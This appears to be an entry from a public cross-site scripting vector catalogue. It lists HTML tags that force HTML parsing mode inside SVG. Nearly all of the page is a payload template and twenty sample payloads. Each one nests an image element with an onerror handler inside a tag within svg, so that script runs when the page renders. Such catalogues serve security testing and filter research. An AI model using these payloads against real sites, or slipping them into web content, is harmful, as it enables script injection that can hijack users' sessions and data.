HTML tags that force HTML mode inside SVG

⚠ Browser differences

This vector shows which HTML elements cause the browser to change to HTML mode.

Created Aug 2, 2024

Updated May 27, 2025

Detecting browser...

CategoryXML Parsing

VisibilityPublic

TypeXSS

CharsetUTF-8

$[data1] placeholderhtml

Template used:

<svg><$[data1]><image src=data: onerror=log('$[data1]')></$[data1]></svg>

Sample payloads

<svg><title><image src=data: onerror=alert('title')></title></svg>

<svg><meta><image src=data: onerror=alert('meta')></meta></svg>

<svg><i><image src=data: onerror=alert('i')></i></svg>

<svg><body><image src=data: onerror=alert('body')></body></svg>

<svg><table><image src=data: onerror=alert('table')></table></svg>

<svg><em><image src=data: onerror=alert('em')></em></svg>

<svg><nobr><image src=data: onerror=alert('nobr')></nobr></svg>

<svg><img><image src=data: onerror=alert('img')></img></svg>

<svg><dd><image src=data: onerror=alert('dd')></dd></svg>

<svg><br><image src=data: onerror=alert('br')></br></svg>

<svg><strong><image src=data: onerror=alert('strong')></strong></svg>

<svg><small><image src=data: onerror=alert('small')></small></svg>

<svg><strike><image src=data: onerror=alert('strike')></strike></svg>

<svg><blockquote><image src=data: onerror=alert('blockquote')></blockquote></svg>

<svg><big><image src=data: onerror=alert('big')></big></svg>

<svg><center><image src=data: onerror=alert('center')></center></svg>

<svg><pre><image src=data: onerror=alert('pre')></pre></svg>

<svg><head><image src=data: onerror=alert('head')></head></svg>

<svg><ol><image src=data: onerror=alert('ol')></ol></svg>

<svg><embed><image src=data: onerror=alert('embed')></embed></svg>